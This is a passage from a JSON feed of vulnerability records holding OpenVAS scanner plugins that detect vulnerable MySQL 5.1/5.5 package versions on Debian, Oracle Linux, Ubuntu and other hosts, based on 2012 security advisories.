Debian Linux\";\ntag_insight = \"MySQL is a fast, stable and true multi-user, multi-threaded SQL database\nserver.\";\ntag_solution = \"For the testing distribution (wheezy) and unstable distribution (sid), these\nproblems have been fixed in version 5.5.28+dfsg-1.\n\nAdditionally, CVE-2012-5611 has been fixed in this upload. The vulnerability\n(discovered independently by Tomas Hoger from the Red Hat Security Response\nTeam and king cope) is a stack-based buffer overflow in acl_get() when\nchecking user access to a database. Using a carefully crafted database name, an\nalready authenticated MySQL user could make the server crash or even execute\narbitrary code as the mysql system user.\n\nFor the stable distribution (squeeze), this problem has been fixed in version\n5.1.66-0+squeeze1.\n\nFor the testing distribution (wheezy) and unstable distribution (sid), this\nproblem will be fixed soon.\n\nWe recommend that you upgrade your mysql-5.1 packages.\";\ntag_summary = \"Several issues have been discovered in the MySQL database server. The\nvulnerabilities are addressed by upgrading MySQL to a new upstream version,\n5.1.66, which includes additional changes, such as performance improvements and\ncorrections for data loss defects. These changes are described in the\nMySQL release notes.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(892581);\n script_version(\"$Revision: 6611 $\");\n script_cve_id(\"CVE-2012-5611\", \"CVE-2012-3173\", \"CVE-2012-3150\", \"CVE-2012-3166\", \"CVE-2012-3163\", \"CVE-2012-3167\", \"CVE-2012-3197\", \"CVE-2012-3180\", \"CVE-2012-3160\", \"CVE-2012-3177\", \"CVE-2012-3158\");\n script_name(\"Debian Security Advisory DSA 2581-1 (mysql-5.1 - several vulnerabilities)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-07 14:07:20 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-18 11:53:02 +0200 (Wed, 18 Sep 2013)\");\n script_tag(name: \"cvss_base\", value:\"9.0\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2012/dsa-2581.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libmysqlclient-dev\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqlclient16\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqld-dev\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqld-pic\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-client-5.1\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-server-5.1\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-server-core-5.1\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-07-25T12:23:02", "bulletinFamily": "scanner", "description": "The host is running Oracle MySQL server and is prone to multiple\n vulnerabilities.", "modified": "2019-07-24T00:00:00", "published": "2012-11-26T00:00:00", "id": "OPENVAS:1361412562310803111", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803111", "title": "Oracle MySQL Server Multiple Vulnerabilities-01 Nov12 (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle MySQL Server Multiple Vulnerabilities-01 Nov12 (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mysql:mysql\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803111\");\n script_version(\"2019-07-24T11:36:46+0000\");\n script_cve_id(\"CVE-2012-3197\", \"CVE-2012-3163\", \"CVE-2012-3158\", \"CVE-2012-3150\");\n script_bugtraq_id(56036, 56017, 55990, 56005);\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-24 11:36:46 +0000 (Wed, 24 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2012-11-26 16:54:56 +0530 (Mon, 26 Nov 2012)\");\n script_name(\"Oracle MySQL Server Multiple Vulnerabilities-01 Nov12 (Windows)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/51008/\");\n script_xref(name:\"URL\", value:\"http://www.securelist.com/en/advisories/51008\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html\");\n script_xref(name:\"URL\", value:\"https://support.oracle.com/rs?type=doc&id=1475188.1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"Databases\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_dependencies(\"mysql_version.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/mysql\", 3306);\n script_mandatory_keys(\"MySQL/installed\", \"Host/runs_windows\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker to disclose potentially\n sensitive information, manipulate certain data and cause a DoS (Denial of Service).\");\n\n script_tag(name:\"affected\", value:\"Oracle MySQL version 5.1.x to 5.1.64 and\n Oracle MySQL version 5.5.x to 5.5.26 on Windows.\");\n\n script_tag(name:\"insight\", value:\"The flaws are due to multiple unspecified errors in MySQL server component\n related to server replication, information schema, protocol and server optimizer.\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the referenced vendor advisory or upgrade to the latest version.\");\n\n script_tag(name:\"summary\", value:\"The host is running Oracle MySQL server and is prone to multiple\n vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!vers = get_app_version(cpe:CPE, port:port))\n exit(0);\n\nvers = eregmatch(pattern:\"([0-9.a-z]+)\", string:vers);\nif(vers[1])\n{\n if(version_in_range(version:vers[1], test_version:\"5.1.0\", test_version2:\"5.1.64\") ||\n version_in_range(version:vers[1], test_version:\"5.5.0\", test_version2:\"5.5.26\")){\n report = report_fixed_ver(installed_version:vers[1], fixed_version:\"Apply the patch\");\n security_message(data:report, port:port);\n exit(0);\n }\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-07-25T12:16:46", "bulletinFamily": "scanner", "description": "The host is running Oracle MySQL server\n and is prone to multiple vulnerabilities.", "modified": "2019-07-24T00:00:00", "published": "2017-11-22T00:00:00", "id": "OPENVAS:1361412562310812190", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812190", "title": "Oracle MySQL Server Multiple Vulnerabilities-01 Nov12 (Linux)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle MySQL Server Multiple Vulnerabilities-01 Nov12 (Linux)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mysql:mysql\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812190\");\n script_version(\"2019-07-24T11:36:46+0000\");\n script_cve_id(\"CVE-2012-3197\", \"CVE-2012-3163\", \"CVE-2012-3158\", \"CVE-2012-3150\");\n script_bugtraq_id(56036, 56017, 55990, 56005);\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-24 11:36:46 +0000 (Wed, 24 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-11-22 19:08:06 +0530 (Wed, 22 Nov 2017)\");\n script_name(\"Oracle MySQL Server Multiple Vulnerabilities-01 Nov12 (Linux)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/51008/\");\n script_xref(name:\"URL\", value:\"http://www.securelist.com/en/advisories/51008\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html\");\n script_xref(name:\"URL\", value:\"https://support.oracle.com/rs?type=doc&id=1475188.1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Databases\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_dependencies(\"mysql_version.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/mysql\", 3306);\n script_mandatory_keys(\"MySQL/installed\", \"Host/runs_unixoide\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to disclose potentially sensitive information, manipulate certain\n data and cause a DoS (Denial of Service).\");\n\n script_tag(name:\"affected\", value:\"Oracle MySQL version 5.1.x to 5.1.64 and\n Oracle MySQL version 5.5.x to 5.5.26 on Windows.\");\n\n script_tag(name:\"insight\", value:\"The flaws are due to multiple unspecified\n errors in MySQL server component related to server replication, information\n schema, protocol and server optimizer.\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the referenced vendor\n advisory or upgrade to the latest version.\");\n\n script_tag(name:\"summary\", value:\"The host is running Oracle MySQL server\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE))\n exit(0);\n\nvers = infos['version'];\npath = infos['location'];\n\nvers = eregmatch(pattern:\"([0-9.a-z]+)\", string:vers);\n\nif(vers[1])\n{\n if(version_in_range(version:vers[1], test_version:\"5.1.0\", test_version2:\"5.1.64\") ||\n version_in_range(version:vers[1], test_version:\"5.5.0\", test_version2:\"5.5.26\"))\n {\n report = report_fixed_ver(installed_version:vers[1], fixed_version:\"Apply the patch\", install_path:path);\n security_message(data:report, port:port);\n exit(0);\n }\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-07-25T12:16:46", "bulletinFamily": "scanner", "description": "The host is running Oracle MySQL server\n and is prone to multiple vulnerabilities.", "modified": "2019-07-24T00:00:00", "published": "2017-11-22T00:00:00", "id": "OPENVAS:1361412562310812191", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812191", "title": "Oracle MySQL Server Multiple Vulnerabilities-02 Nov12 (Linux)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle MySQL Server Multiple Vulnerabilities-02 Nov12 (Linux)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mysql:mysql\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812191\");\n script_version(\"2019-07-24T11:36:46+0000\");\n script_cve_id(\"CVE-2012-3180\", \"CVE-2012-3177\", \"CVE-2012-3160\");\n script_bugtraq_id(56003, 56005, 56027);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-24 11:36:46 +0000 (Wed, 24 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-11-22 19:15:42 +0530 (Wed, 22 Nov 2017)\");\n script_name(\"Oracle MySQL Server Multiple Vulnerabilities-02 Nov12 (Linux)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/51008/\");\n script_xref(name:\"URL\", value:\"http://www.securelist.com/en/advisories/51008\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html\");\n script_xref(name:\"URL\", value:\"https://support.oracle.com/rs?type=doc&id=1475188.1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Databases\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_dependencies(\"mysql_version.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/mysql\", 3306);\n script_mandatory_keys(\"MySQL/installed\", \"Host/runs_unixoide\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to disclose potentially sensitive information, manipulate certain\n data and cause a DoS (Denial of Service).\");\n\n script_tag(name:\"affected\", value:\"Oracle MySQL version 5.1.x to 5.1.65 and\n Oracle MySQL version 5.5.x to 5.5.27 on Windows.\");\n\n script_tag(name:\"insight\", value:\"The flaws are due to multiple unspecified\n errors in MySQL server component related to server installation and server optimizer.\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the referenced vendor advisory\n or upgrade to the latest version.\");\n\n script_tag(name:\"summary\", value:\"The host is running Oracle MySQL server\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE))\n exit(0);\n\nvers = infos['version'];\npath = infos['location'];\n\nvers = eregmatch(pattern:\"([0-9.a-z]+)\", string:vers);\n\nif(vers[1])\n{\n if(version_in_range(version:vers[1], test_version:\"5.1.0\", test_version2:\"5.1.65\") ||\n version_in_range(version:vers[1], test_version:\"5.5.0\", test_version2:\"5.5.27\"))\n {\n report = report_fixed_ver(installed_version:vers[1], fixed_version:\"Apply the patch\", install_path:path);\n security_message(data:report, port:port);\n exit(0);\n }\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:57", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2012-1462", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123778", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123778", "title": "Oracle Linux Local Check: ELSA-2012-1462", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2012-1462.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123778\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:08:26 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2012-1462\");\n script_tag(name:\"insight\", value:\"ELSA-2012-1462 - mysql security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2012-1462\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2012-1462.html\");\n script_cve_id(\"CVE-2012-0540\", \"CVE-2012-1688\", \"CVE-2012-1689\", \"CVE-2012-1690\", \"CVE-2012-1703\", \"CVE-2012-1734\", \"CVE-2012-2749\", \"CVE-2012-3150\", \"CVE-2012-3158\", \"CVE-2012-3160\", \"CVE-2012-3163\", \"CVE-2012-3166\", \"CVE-2012-3167\", \"CVE-2012-3173\", \"CVE-2012-3177\", \"CVE-2012-3180\", \"CVE-2012-3197\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.1.66~1.el6_3\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.1.66~1.el6_3\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mysql-devel\", rpm:\"mysql-devel~5.1.66~1.el6_3\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mysql-embedded\", rpm:\"mysql-embedded~5.1.66~1.el6_3\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mysql-embedded-devel\", rpm:\"mysql-embedded-devel~5.1.66~1.el6_3\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mysql-libs\", rpm:\"mysql-libs~5.1.66~1.el6_3\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mysql-server\", rpm:\"mysql-server~5.1.66~1.el6_3\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mysql-test\", rpm:\"mysql-test~5.1.66~1.el6_3\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:39", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1621-1", "modified": "2019-03-13T00:00:00", "published": "2012-11-06T00:00:00", "id": "OPENVAS:1361412562310841207", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841207", "title": "Ubuntu Update for mysql-5.5 USN-1621-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1621_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for mysql-5.5 USN-1621-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1621-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.841207\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-11-06 17:48:44 +0530 (Tue, 06 Nov 2012)\");\n script_cve_id(\"CVE-2012-3144\", \"CVE-2012-3147\", \"CVE-2012-3149\", \"CVE-2012-3150\",\n \"CVE-2012-3156\", \"CVE-2012-3158\", \"CVE-2012-3160\", \"CVE-2012-3163\",\n \"CVE-2012-3166\", \"CVE-2012-3167\", \"CVE-2012-3173\", \"CVE-2012-3177\",\n \"CVE-2012-3180\", \"CVE-2012-3197\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name:\"USN\", value:\"1621-1\");\n script_name(\"Ubuntu Update for mysql-5.5 USN-1621-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(12\\.04 LTS|11\\.10|10\\.04 LTS|12\\.10)\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1621-1\");\n script_tag(name:\"affected\", value:\"mysql-5.5 on Ubuntu 12.10,\n Ubuntu 12.04 LTS,\n Ubuntu 11.10,\n Ubuntu 10.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Multiple security issues were discovered in MySQL and this update includes\n new upstream MySQL versions to fix these issues.\n\n MySQL has been updated to 5.1.66 in Ubuntu 10.04 LTS and Ubuntu 11.10.\n Ubuntu 12.04 LTS and Ubuntu 12.10 have been updated to MySQL 5.5.28.\n\n In addition to security fixes, the updated packages contain bug fixes, new\n features, and possibly incompatible changes.\n\n Please see the references for more information.\");\n\n script_xref(name:\"URL\", value:\"http://dev.mysql.com/doc/refman/5.1/en/news-5-1-x.html\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.5\", ver:\"5.5.28-0ubuntu0.12.04.2\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.1\", ver:\"5.1.66-0ubuntu0.11.10.2\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.1\", ver:\"5.1.66-0ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.5\", ver:\"5.5.28-0ubuntu0.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2017-12-04T11:19:43", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1621-1", "modified": "2017-12-01T00:00:00", "published": "2012-11-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=841207", "id": "OPENVAS:841207", "title": "Ubuntu Update for mysql-5.5 USN-1621-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1621_1.nasl 7960 2017-12-01 06:58:16Z santu $\n#\n# Ubuntu Update for mysql-5.5 USN-1621-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple security issues were discovered in MySQL and this update includes\n new upstream MySQL versions to fix these issues.\n\n MySQL has been updated to 5.1.66 in Ubuntu 10.04 LTS and Ubuntu 11.10.\n Ubuntu 12.04 LTS and Ubuntu 12.10 have been updated to MySQL 5.5.28.\n \n In addition to security fixes, the updated packages contain bug fixes, new\n features, and possibly incompatible changes.\n \n Please see the following for more information:\n 